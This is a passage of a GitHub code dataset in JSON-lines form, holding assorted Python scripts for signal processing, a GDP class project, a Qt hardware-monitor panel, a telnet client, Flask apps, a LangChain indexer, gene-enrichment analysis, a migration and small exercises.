data_dec[:, 0]\n for ch in range(1, data_filt.shape[1]):\n if ch == data_filt.shape[1] - 3:\n data_filt[:, ch] = sgn.filtfilt(ba_ppg[0], ba_ppg[1], data_dec[:, ch])\n else:\n data_filt[:, ch] = sgn.filtfilt(ba[0], ba[1], data_dec[:, ch])\n\n np.savetxt(filename + '_filt.tsv.gz', data_filt)\n return data_filt\n\n\ndef plot_all(data, filename, start=100, end=500, dpi=SET_DPI, size=FIGSIZE):\n ch_num = data.shape[1] # get number of channels:\n fig, ax = plt.subplots(ch_num - 1, 1, figsize=size, sharex=True)\n time = data[:, 0] # assume time is first channel\n fig.suptitle(os.path.basename(filename))\n for ch in range(1, ch_num):\n ax[ch - 1].plot(time[start:end], data[start:end, ch])\n ax[ch - 1].set_title(f' Channel {ch}')\n ax[ch - 1].grid()\n ax[ch - 1].set_xlabel('seconds')\n fig.savefig(f'{filename}.png', dpi=dpi, figsize=size, bbox_inches='tight')\n\n\nwdir = sys.argv[1]\nsub = sys.argv[2]\n\ncwd = os.getcwd()\n\nos.chdir(wdir)\n\nfor ses in range(1, 12):\n\n for task in ['motor', 'simon', 'pinel', 'rest_run-01',\n 'rest_run-02', 'rest_run-03', 'rest_run-04']:\n os.chdir(wdir)\n path = f'sub-{sub}/ses-{ses:02g}/func'\n filename = f'sub-{sub}_ses-{ses:02g}_task-{task}_physio'\n try:\n os.chdir(path)\n try:\n os.mkdir('../func_phys')\n except:\n print('Folder func_phys already exists')\n\n os.chdir('../func_phys')\n try:\n print(f'Copying file {filename}')\n 
copyfile(f'../func/{filename}.tsv.gz', f'./{filename}.tsv.gz')\n except:\n print('Cannot copy file')\n\n print(f'Decimating {filename}')\n\n data_dec = decimate_data(f'./{filename}')\n data_filt = filter_signal(data_dec)\n\n plot_all(data_filt, f'./{filename}_filt', 100, 500)\n plot_all(data_dec, f'./{filename}_dec', 100, 500)\n plt.close('all')\n except Exception:\n print(f'Something went awry. Check {sub} {ses:02g} {task}.')\n\nos.chdir(cwd)\n","repo_name":"smoia/EuskalIBUR_dataproc","sub_path":"20.python_scripts/new_biopac_decimate.py","file_name":"new_biopac_decimate.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"14767775366","text":"def openfile():\n\t#fileloc = input(\"Enter file name: \")\n\tfileloc=(\"GDP.txt\")\n\ttry:\n\t\tfp = open(fileloc)\n\t\treturn fp\n\texcept FileNotFoundError:\n\t\tprint(\"File not found.\")\n\t\tfp=openfile()\n\t\treturn fp\n\ndef find_min_percent(line):\n\ti=0\n\tline=line-1\n\twhile ifloat(maxval):\n\t\t\t\tmaxval=currval\n\t\t\t\tmaxval_index=(x*12)\n\t\t\t\tlinetxt=linetxt[12:]\n\t\t\telse:\n\t\t\t\tlinetxt=linetxt[12:]\n\t\texcept ValueError:\n\t\t\tprint(\"Current Val is: \",currval)\n\t\t\tprint(\"Maxval is: \",maxval)\n\treturn(maxval,maxval_index)\n\ndef find_gdp(line,index):\n\tfpgdp=openfile()\n\ti=0\n\tline=line-1\n\twhile i999.9:\n\t\tbill_or_millmin=\"trillion\"\n\t\tmin_val_gdp=float(min_val_gdp)/1000\n\t\tmin_val_gdp='{:2,.2f}'.format(float(min_val_gdp))\n\tif float(max_val_gdp)>999.9:\n\t\tbill_or_millmax=\"trillion\"\n\t\tmax_val_gdp=float(max_val_gdp)/1000\n\t\tmax_val_gdp='{:2,.2f}'.format(float(max_val_gdp))\n\tprint(\"The minimum change in GDP was \",min_val,\" percent in\",min_year, \" when the GDP was \",min_val_gdp,\" \",bill_or_millmin,\" dollars.\")\n\tprint(\"The maximum change in GDP was \",max_val,\" percent in\",max_year,\" when the GDP was \",max_val_gdp,\" \",bill_or_millmax,\" dollars.\")\n#Gross Domestic Product\n#The minimum change in GDP was -2.8 percent in 2009 when the GDP was 14.42 trillion dollars.\n#The maximum change in GDP was 7.3 percent in 1984 when the GDP was 4.04 trillion dollars.\nfpmin=openfile()\nfpmax=openfile()\n\n\nminval,minval_index=find_min_percent(9)\nmaxval,maxval_index=find_max_percent(9)\ngdp_min=find_gdp(44,552)\ngdp_max=find_gdp(44,257)\n#print (minval,minval_index)\n#print(maxval,maxval_index)\n#print(gdp_min,gdp_max)\ndisplay(minval,2009,gdp_min,maxval,1984,gdp_max)","repo_name":"ndragon798/cse231","sub_path":"Fall 2016/Project04/proj4.py","file_name":"proj4.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23627115585","text":"from PySide2.QtWidgets import QWidget, QFrame, QHBoxLayout, QVBoxLayout, QGridLayout, \\\n QLabel, QGroupBox, QButtonGroup, QRadioButton, QPushButton\nfrom PySide2.QtGui import QFont\nfrom PySide2.QtCore import Qt\nimport usb_msg as um\n\nclass ReadLoad(QFrame):\n def __init__(self, parent, usbif):\n super().__init__(parent)\n \n self._s1_s2_switches = {}\n self._usbif = usbif\n\n self._setup_ui()\n\n usbif.send(um.WriteControlLoadReadS1S2(0, 0, 0, 0, 0))\n\n def _update_s1_s2_switches(self, state):\n switch_states = {switch: self._s1_s2_switches[switch].isChecked() for switch in self._s1_s2_switches.keys()}\n self._usbif.send(um.WriteControlLoadReadS1S2(**switch_states))\n\n def _setup_ui(self):\n self.setFrameStyle(QFrame.StyledPanel | 
QFrame.Raised)\n\n layout = QHBoxLayout(self)\n self.setLayout(layout)\n layout.setMargin(1)\n layout.setSpacing(1)\n\n adv_widget = QWidget(self)\n layout.addWidget(adv_widget)\n adv_layout = QVBoxLayout(adv_widget)\n adv_layout.addSpacing(15)\n l = QLabel('ADV\\nS', adv_widget)\n l.setAlignment(Qt.AlignCenter)\n font = l.font()\n font.setPointSize(7)\n font.setBold(True)\n l.setFont(font)\n adv_layout.addWidget(l)\n\n b = QPushButton(adv_widget)\n b.setFixedSize(20,20)\n b.pressed.connect(lambda: self._usbif.send(um.WriteControlAdvanceS()))\n adv_layout.addWidget(b)\n adv_layout.setAlignment(b, Qt.AlignCenter)\n\n l = QLabel('CRS\\nPARITY', adv_widget)\n l.setFont(font)\n l.setAlignment(Qt.AlignCenter)\n adv_layout.addWidget(l, Qt.AlignCenter)\n\n b1, b2, b3, s1, s2, s3 = self._create_switch_group(layout, 'LOAD', 'PRESET\\nCHAN',\n ['ODD', 'EVEN'], ['S1', 'S2'], ['S1', 'S2'])\n b1.pressed.connect(lambda: self._usbif.send(um.WriteControlLoadS()))\n b2.pressed.connect(lambda: self._usbif.send(um.WriteControlLoadPreset()))\n b3.pressed.connect(lambda: self._usbif.send(um.WriteControlLoadChan()))\n self._s1_s2_switches['load_preset'] = s2\n self._s1_s2_switches['load_chan'] = s3\n s2.toggled.connect(self._update_s1_s2_switches)\n s3.toggled.connect(self._update_s1_s2_switches)\n\n b1, b2, b3, s1, s2, s3 = self._create_switch_group(layout, 'READ', 'PRESET\\nCHAN',\n None, ['S1', 'S2'], ['S1', 'S2'])\n b1.pressed.connect(lambda: self._usbif.send(um.WriteControlReadS()))\n b2.pressed.connect(lambda: self._usbif.send(um.WriteControlReadPreset()))\n b3.pressed.connect(lambda: self._usbif.send(um.WriteControlReadChan()))\n self._s1_s2_switches['read_preset'] = s2\n self._s1_s2_switches['read_chan'] = s3\n s2.toggled.connect(self._update_s1_s2_switches)\n s3.toggled.connect(self._update_s1_s2_switches)\n\n b1, b2, b3, s1, s2, s3 = self._create_switch_group(layout, 'START', '\\nRESTART',\n None, ['S1', 'S2'], None)\n b1.pressed.connect(lambda: self._usbif.send(um.WriteControlStartS()))\n b2.pressed.connect(lambda: self._usbif.send(um.WriteControlStartPreset()))\n b3.pressed.connect(lambda: self._usbif.send(um.WriteControlStart()))\n self._s1_s2_switches['start_preset'] = s2\n s2.toggled.connect(self._update_s1_s2_switches)\n\n pro_widget = QWidget(self)\n layout.addWidget(pro_widget)\n pro_layout = QVBoxLayout(pro_widget)\n pro_layout.addSpacing(15)\n\n l = QLabel('PROCEED', pro_widget)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n pro_layout.addWidget(l)\n\n b = QPushButton(pro_widget)\n b.setFixedSize(20,20)\n pro_layout.addWidget(b)\n pro_layout.setAlignment(b, Qt.AlignCenter | Qt.AlignTop)\n b.pressed.connect(lambda: self._usbif.send(um.WriteControlProceed()))\n\n l = QLabel('RESET\\nERROR', pro_widget)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n pro_layout.addWidget(l)\n\n b = QPushButton(pro_widget)\n b.setFixedSize(20,20)\n pro_layout.addWidget(b)\n pro_layout.setAlignment(b, Qt.AlignCenter | Qt.AlignTop)\n\n\n def _create_switch_group(self, layout, group_name, button3, switch1, switch2, switch3):\n group_box = QGroupBox(group_name, self)\n layout.addWidget(group_box)\n group_layout = QGridLayout(group_box)\n group_box.setLayout(group_layout)\n group_layout.setMargin(0)\n group_layout.setSpacing(0)\n \n l = QLabel('S', group_box)\n l.setAlignment(Qt.AlignCenter)\n\n font = l.font()\n font.setPointSize(7)\n font.setBold(True)\n l.setFont(font)\n l.setMinimumWidth(30)\n group_layout.addWidget(l, 0, 0, Qt.AlignBottom)\n\n l = QLabel('PRESET', group_box)\n 
l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n l.setMinimumWidth(30)\n group_layout.addWidget(l, 0, 1, Qt.AlignBottom)\n\n l = QLabel(button3, group_box)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n l.setMinimumWidth(30)\n group_layout.addWidget(l, 0, 2, Qt.AlignBottom)\n\n b1 = QPushButton(group_box)\n b1.setFixedSize(20,20)\n group_layout.addWidget(b1, 1, 0, Qt.AlignCenter)\n\n b2 = QPushButton(group_box)\n b2.setFixedSize(20,20)\n group_layout.addWidget(b2, 1, 1, Qt.AlignCenter)\n\n b3 = QPushButton(group_box)\n b3.setFixedSize(20,20)\n group_layout.addWidget(b3, 1, 2, Qt.AlignCenter)\n\n s1 = self._create_switch(group_box, group_layout, 0, switch1)\n s2 = self._create_switch(group_box, group_layout, 1, switch2)\n s3 = self._create_switch(group_box, group_layout, 2, switch3)\n\n return b1, b2, b3, s1, s2, s3\n\n def _create_switch(self, box, layout, col, labels):\n if labels is None:\n return None\n\n l = QLabel(labels[0], box)\n l.setMinimumHeight(20)\n l.setAlignment(Qt.AlignCenter | Qt.AlignBottom)\n\n font = l.font()\n font.setPointSize(7)\n font.setBold(True)\n l.setFont(font)\n layout.addWidget(l, 3, col, Qt.AlignBottom | Qt.AlignCenter)\n\n r1 = QRadioButton(box)\n r1.setStyleSheet('QRadioButton::indicator{subcontrol-position:center;}')\n layout.addWidget(r1, 4, col, Qt.AlignCenter)\n\n r2 = QRadioButton(box)\n r2.setStyleSheet('QRadioButton::indicator{subcontrol-position:center;}')\n layout.addWidget(r2, 5, col, Qt.AlignCenter)\n\n l = QLabel(labels[1], box)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n layout.addWidget(l, 6, col, Qt.AlignTop | Qt.AlignCenter)\n\n g = QButtonGroup(box)\n g.addButton(r1)\n g.addButton(r2)\n r1.setChecked(True)\n\n return r2\n","repo_name":"thewonderidiot/agc_monitor","sub_path":"client/agc_monitor/read_load.py","file_name":"read_load.py","file_ext":"py","file_size_in_byte":6994,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"31588038857","text":"import requests, sys\nimport json\n\nserver = \"https://rest.ensembl.org\"\next = \"/homology/id/ENSG00000157764?sequence=cdna\"\n\nr = requests.get(server+ext, headers={ \"Content-Type\" : \"application/json\"})\n\nif not r.ok:\n r.raise_for_status()\n sys.exit()\n\njs_decoded = r.json()\n# jtxt= str(repr(decoded))\n# print(jtxt)\n\n# jsonObject = json.loads(jtxt)\nfor key in js_decoded:\n print(key)\n # value = js_decoded[key][\"homologies\"]\n value = js_decoded[key][0]['homologies']\n for homo in value:\n print(len(homo['source']['align_seq']))\n print(len(homo['target']['align_seq']))\n # ['target'])\n print(\">>> \\n\\n\\n\")\n\n# the result is a Python dictionary:\n","repo_name":"Kuanhao-Chao/Wheeler_Graph_Toolkit","sub_path":"data/multiseq_alignment/Ensembl_REST/homologous_alingments.py","file_name":"homologous_alingments.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"35947697558","text":"# -*- coding: utf-8 -*-\nimport time\nimport logging\nimport telnetlib\n\nlog = logging.getLogger(__name__)\n\n\nclass TelnetClient:\n\n def __init__(self, host, user, pwd, ttl=15):\n self.host = host\n self.user = user\n self.pwd = pwd\n self.ttl = ttl\n self.tn = None\n\n def soft_reset(self):\n self.write('raise SystemExit')\n log.info('Soft reset executed')\n\n def hard_reset(self):\n self.write('import machine')\n self.write('machine.reset()')\n self.write('\\x04')\n log.info('Machine reseted.')\n\n def open(self):\n 
self.tn = telnetlib.Telnet(self.host, 23, self.ttl)\n if b'Login as: ' in self.tn.read_until(b'Login as: ', self.ttl):\n log.info('Connection established')\n self.write(self.user)\n if b'Password:' in self.tn.read_until(b'Password:', self.ttl):\n time.sleep(0.2)\n self.write(self.pwd)\n sentinel = b'for more information.'\n if sentinel in self.tn.read_until(sentinel, self.ttl):\n log.info('Login success.')\n return self.tn\n raise ConnectionError('Connection failed :(')\n\n def write(self, s):\n self.tn.write(bytes(s, 'ascii') + b\"\\r\\n\")\n\n def close(self):\n if self.tn:\n self.tn.close()\n self.tn = None\n log.info('Connection closed')\n","repo_name":"titusz/followlight","sub_path":"tools/telnet.py","file_name":"telnet.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34040495631","text":"import os\nimport requests\n\nfrom flask import Flask, send_from_directory\nfrom flask_restful import Resource, Api\nfrom webargs import fields\nfrom webargs.flaskparser import use_args\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\nrates_token = \"token must be here\"\nstatic_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')\n\napp = Flask(__name__)\napi = Api(app)\n\n\n@app.route('/', methods=['GET'])\ndef serve_dir_directory_index():\n return send_from_directory(static_file_dir, 'index.html')\n\n\nclass ApiResource(Resource):\n currency_args = {\n 'from': fields.Str(required=True),\n 'to': fields.Str(required=True),\n 'value': fields.Float(required=True),\n }\n\n @use_args(currency_args)\n def get(self, args):\n rate_from = rates_data.get(args['from'])\n rate_to = rates_data.get(args['to'])\n value = args['value']\n return {'value': value * rate_to / rate_from}\n\n\napi.add_resource(ApiResource, '/api/')\n\n\nclass RatesStore:\n def __init__(self):\n self.rates_data = None\n self.update_rates()\n sched = BackgroundScheduler(daemon=True)\n sched.add_job(self.update_rates, 'interval', hours=24)\n sched.start()\n\n def update_rates(self):\n params = {'app_id': rates_token}\n r = requests.get('https://openexchangerates.org/api/latest.json', params=params)\n self.rates_data = r.json()\n\n def get(self, arg):\n return self.rates_data.get('rates').get(arg)\n\n\nif __name__ == '__main__':\n rates_data = RatesStore()\n app.run(debug=False)\n","repo_name":"DrunkJedi/currency_conversion","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19793499675","text":"import os\nimport subprocess\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Pinecone\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom dotenv import load_dotenv\nimport openai\nimport pinecone\nimport shutil\n\n\n\n\n\ndef clone_repository(repo_url, local_path):\n if(os.path.isdir(local_path)):\n print(\"Removing exsisting code repository !\")\n shutil.rmtree(local_path)\n subprocess.run([\"git\", \"clone\", repo_url, local_path])\n\n\ndef load_docs(root_dir):\n docs = []\n for dirpath, dirnames, filenames in os.walk(root_dir):\n for file in filenames:\n try:\n loader = TextLoader(os.path.join(\n dirpath, file), encoding='utf-8')\n docs.extend(loader.load_and_split())\n except Exception as e:\n pass\n return docs\n\n\ndef split_docs(docs):\n 
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n return text_splitter.split_documents(docs)\n\n\ndef create_pinecone_index_ifnot_exsists(pinecone_obj, index_name):\n if index_name not in pinecone_obj.list_indexes():\n pinecone_obj.create_index(\n name=index_name,\n dimension=EMBEDDING_SIZE,\n metric='cosine'\n )\n\n\ndef main(repo_url, root_dir,index_name, pinecone_obj ):\n clone_repository(repo_url, root_dir)\n docs = load_docs(root_dir)\n texts = split_docs(docs)\n embeddings = OpenAIEmbeddings()\n create_pinecone_index_ifnot_exsists(pinecone_obj, index_name)\n _ = Pinecone.from_texts( texts=[t.page_content for t in texts],embedding=embeddings, index_name=index_name)\n\n\nif __name__ == \"__main__\":\n load_dotenv()\n #Langchain's defaul openai model(text-embedding-ada-002) and default embedding size\n EMBEDDING_SIZE = 1536\n index_name = os.environ.get('INDEX_NAME')\n \n\n openai.api_key = os.environ.get('OPENAI_API_KEY')\n pinecone.init(\n api_key=os.environ.get('PINECONE_API_KEY'), \n environment=os.environ.get('PINECONE_REGION') \n )\n\n repo_url = os.environ.get('REPO_URL')\n root_dir = \"./gumroad\"\n\n\n\n main(repo_url, root_dir, index_name, pinecone)\n","repo_name":"sai-krishna-msk/Chat-with-Github-Repo-Pinecone-version","sub_path":"github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35253890004","text":"import numpy as np\nimport pandas as pd\n\nimport subprocess, os\n\nfrom statsmodels.stats.multitest import fdrcorrection\nfrom collections import Counter\n\n# import functions previously defined for cell enrichment\nfrom D__cell_enrichments import get_gene_lists, safe_div, calculate_enrichment, run_enrichment\n\ndef main():\n os.makedirs('results/metrics', exist_ok=True)\n # calculate metric differences\n print('')\n print('calculating group differences')\n # load PC coordinates\n pca_data = pd.read_csv('results/PCA/mean-regional-principal-components.csv')\n pca_dict = dict(zip(pca_data['region'], pca_data['PC1']))\n # load corrected cortical metrics for each group\n out_data = pd.read_csv('data/processed_imaging/term-vs-preterm-cortical-metrics-corrected-for-age-and-sex.csv')\n metric_differences = pd.DataFrame(out_data[out_data['term']==1].groupby(['region','metric']).mean()['value'] - out_data[out_data['term']==0].groupby(['region','metric']).mean()['value'])\n metric_differences.reset_index(inplace=True)\n metric_differences['PC1'] = metric_differences['region'].map(pca_dict)\n # save out\n metric_differences.to_csv('results/metrics/metric_differences.csv', index=None)\n\n # first run windowed correlations: for each gene calculate correlation between estimated expression in a given window\n # and regional group differences in T1/T2 at term\n print(\"running models in R\")\n print(\"\")\n retcode = subprocess.call(['/usr/bin/Rscript','./r_code/windowed_correlations.R'])\n print(\"\")\n if retcode==1:\n (\"something went wrong...\")\n\n # load windowed correlations between gene expression and myelin differences\n windowed_correlations = pd.read_csv('results/gene_correlations/windowed_correlations.csv')\n\n # get cell class lists\n background_genes = pd.read_csv('data/gene_lists/background_genes.txt', header=None)[0]\n all_gene_data = pd.read_csv('data/gene_lists/all-scRNA-data.csv')\n cell_classes, cell_class_genes, cell_class_unique_genes = get_gene_lists(all_gene_data, background_genes, class_type='class')\n\n # 
calculate cell class enrichment in each age window\n    print('calculating enrichment of cell class genes in significantly correlated genes for each age window')\n    siggenes=[]\n    enrich=[]\n    p=[]\n    for w in np.arange(10):\n        # for each window\n        win=w+1\n        selected_window = windowed_correlations[windowed_correlations['age']==win]\n        pval = selected_window['pval'].values\n\n        # adjust p-value for FDR across genes\n        adj_pval = fdrcorrection(pval)[1]\n\n        # get significant genes (p<0.05)\n        significant_genes = selected_window.loc[adj_pval<.05,['symbol', 'tau']]\n\n        # genes positively correlated to group difference - higher expression in regions that are most different\n        positive_significant_genes_list = significant_genes.loc[significant_genes['tau']>0,:]\n        negative_significant_genes_list = significant_genes.loc[significant_genes['tau']<0,:]\n\n        # keep list of sig genes in each window\n        siggenes.append(positive_significant_genes_list['symbol'].values)\n\n        # run class enrichment\n        cell_class_enrichment_results = run_enrichment(cell_classes, cell_class_genes, cell_class_unique_genes, list(positive_significant_genes_list['symbol']), list(negative_significant_genes_list['symbol']), background_genes)\n        # keep only results for genes positively correlated (all genes in a cell class) with group differences (and therefore T1/T2)\n        cell_class_enrichment_results = cell_class_enrichment_results[(cell_class_enrichment_results['gene_list']=='all') & (cell_class_enrichment_results['loading']=='positive')]\n\n        enrich.append((cell_class_enrichment_results['enrichment']))\n        p.append((cell_class_enrichment_results['p']))\n\n    # stack up results into dataframe\n    windowed_enrichment = pd.DataFrame(np.vstack(enrich))\n    windowed_enrichment.columns = cell_classes\n    windowed_p = pd.DataFrame(np.vstack(p))\n    windowed_p.columns = [i + '_p' for i in cell_classes]\n\n    # concatenate enrichment and p-values\n    out_csv = pd.concat((windowed_enrichment, windowed_p), axis=1)\n    out_csv = out_csv[sorted(out_csv.columns)]\n    out_csv = out_csv.reset_index()\n    out_csv.rename(columns={'index':'age window'}, inplace=True)\n\n    # save out\n    print('see: results/enrichment/windowed-enrichment.csv')\n    print('')\n    out_csv.to_csv('results/enrichment/windowed-enrichment.csv', index=False)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"garedaba/baby-brains","sub_path":"F__windowed_correlations.py","file_name":"F__windowed_correlations.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
+{"seq_id":"17535209777","text":"\"\"\"empty message\n\nRevision ID: bce5695e9954\nRevises: 1a451a057a0d\nCreate Date: 2022-01-07 18:29:47.273572\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'bce5695e9954'\ndown_revision = '1a451a057a0d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n    op.create_table('favorites',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('planet', sa.String(length=120), nullable=False),\n    sa.Column('people', sa.String(length=120), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('people'),\n    sa.UniqueConstraint('planet')\n    )\n    op.create_table('people',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(length=120), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('name')\n    )\n    op.create_table('planets',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('name', sa.String(length=120), nullable=False),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('name')\n    )\n    op.add_column('user', sa.Column('name', sa.String(length=120), nullable=False))\n    op.create_unique_constraint(None, 'user', ['name'])\n    op.drop_column('user', 'is_active')\n    op.drop_column('user', 'password')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('user', sa.Column('password', mysql.VARCHAR(length=80), nullable=False))\n    op.add_column('user', sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False))\n    op.drop_constraint(None, 'user', type_='unique')\n    op.drop_column('user', 'name')\n    op.drop_table('planets')\n    op.drop_table('people')\n    op.drop_table('favorites')\n    # ### end Alembic commands ###\n","repo_name":"pablop442/Start-Wars-API","sub_path":"migrations/versions/bce5695e9954_.py","file_name":"bce5695e9954_.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"6312925133","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# data\ndata = [[1.6, 51, 'Small'], [1.7, 62, 'Large'], [1.85, 69, 'Large'], [1.42, 64, 'Small'], [1.3, 65, 'Large'], [2.1, 56, 'Large'], [1.4, 58, 'Small'], [1.65, 57, 'Large'], [1.9, 55, 'Large']]\ndf = pd.DataFrame(data, columns = ['Height', 'Weight', 'T-Shirt size'])\n\n# features and target\nX = df[['Height', 'Weight']]\ny = df['T-Shirt size']\n\n# fit model\nknn = KNeighborsClassifier(n_neighbors=7)\nknn.fit(X, y)\n\n# prediction\ntest_data = [[1.5, 60]]\ntest_data = pd.DataFrame(test_data, columns = ['Height', 'Weight'])\nprediction = knn.predict(test_data)\nprint(\"The T-Shirt size of the customer is: \", prediction[0])\n\n# distances\ndistances, indices = knn.kneighbors(test_data)\nprint(\"The distances between the customer data and other data points are: \", distances[0])\n\n","repo_name":"mohisha28/MachineLearning","sub_path":"KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"34217312107","text":"from flask import * \nimport os\nimport json\nfrom urllib.request import urlopen\n\napp = Flask(__name__)\n\n@app.route('/') \n\ndef home():\n    url_api = \"https://api.binance.com/api/v1/ticker/price\"\n    response = urlopen(url_api)\n    \n    data_api_json = json.loads(response.read())\n\n    return render_template('index.html', coinname=data_api_json)\n\nif __name__ == \"__main__\":\n    port = int(os.environ.get(\"PORT\", 5000))\n    app.run(host='0.0.0.0', port=port, debug=True) \n    \n    
\n","repo_name":"aeff60/Real-time-crypto-coin-calculation-web-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73384659639","text":"# Approach 1: Keep pushing in stack for each of opening bracket & when closing bracket comes up, pop and check if it's correct\n# Return false if the stack isn't empty after traversal or if closing bracket is encountered when stack is empty\n# Time O(n) | space O(n)\n\ndef isValid(s):\n brack_stack = []\n brack_pairs = {'(':')', '[':']', '{':'}'}\n for brack in s:\n if brack in ['(', '[', '{']:\n brack_stack.append(brack)\n else:\n if len(brack_stack) == 0:\n return False\n last = brack_stack.pop()\n if brack != brack_pairs[last]:\n return False\n return True if len(brack_stack) == 0 else False\n\nprint(isValid(\"]\"))","repo_name":"v-apor/practice","sub_path":"Week 1/2ValidParan.py","file_name":"2ValidParan.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18575801301","text":"# Global variables\r\nposition = []\r\nsequence = []\r\nnumeralRep =[]\r\n\r\nfrom os import path \r\npathTest = path.exists('decoder.txt') == True\r\n\r\n# Se valida que el archivo este creado\r\nif( path.exists('decodedString.txt') == False):\r\n f = open(\"decodedString.txt\", \"x\")\r\n x = input(\"Archivo a codificar no existe, ingrese un string: \")\r\n f = open(\"decodedString.txt\", \"a\")\r\n f.write(x)\r\n f.close()\r\n \r\n\r\nf = open(\"decodedString.txt\", \"r\")\r\n\r\n\r\ndecodedString = f.readlines()[0]\r\n\r\nsequence = ['<']\r\npara = 0\r\nfor i in range(len(decodedString)):\r\n print(\"valor de i = \", i)\r\n if decodedString[i] in sequence:\r\n for k in range(len(decodedString)+1):\r\n if k > i:\r\n print(decodedString[i:k], \"i:\", i , \"k\",k)\r\n if decodedString[i:k] in sequence:\r\n print(decodedString[i:k], \"esta en\", sequence)\r\n else:\r\n sequence.append(decodedString[i:k])\r\n i = k\r\n para = k\r\n print(\"decoded striiin\", len(decodedString))\r\n print(k)\r\n if(k == len(decodedString)):\r\n break\r\n \r\n print(\"valor de i =\", i)\r\n print(\"valor de i = \", i)\r\n\r\n else:\r\n sequence.append(decodedString[i])\r\n print(\"valor de i = \", i)\r\n \r\n if(para == len(decodedString)):\r\n sequence.pop(0)\r\n print(sequence)\r\n break\r\nf.close()\r\n\r\n\r\n\r\nfor i in range(len(sequence)):\r\n for j in range(len(sequence)):\r\n compareI = sequence[i]\r\n compareJ = sequence[j]\r\n print(i, j)\r\n print(\"compare I \", compareI, \" compare J \", compareJ)\r\n print(\"Si\", compareI[1:len(compareI)], \"es igual a \", compareJ)\r\n if(compareI[1:len(compareI)] == compareJ and len(compareI)-1 != 0):\r\n numeralRep.append(str(j+1) + compareI[len(compareI)-1] )\r\n break\r\n\r\n else:\r\n if(len(compareI)-1 == 0 and len(sequence) != i):\r\n numeralRep.append(\"0\" + compareI)\r\n break\r\n else:\r\n #print(i, j)\r\n #print(compareI)\r\n print(\"Sii\", compareI[0], \"es igual a \", compareJ)\r\n if(compareI[0] == compareJ and len(compareI)-1 != 0):\r\n numeralRep.append(str(j+1) + compareI[len(compareI)-1])\r\n \r\ncodedList = []\r\ncodedString = []\r\nj = 0\r\n\r\nfor i in range(len(numeralRep)):\r\n compareI = numeralRep[i]\r\n print(compareI[0])\r\n if(compareI[0] == \"0\"):\r\n print(\"holaaaa\")\r\n codedList.append(j)\r\n codedString.append(compareI[-1])\r\n j += 1\r\n\r\ni=0\r\nfor i in 
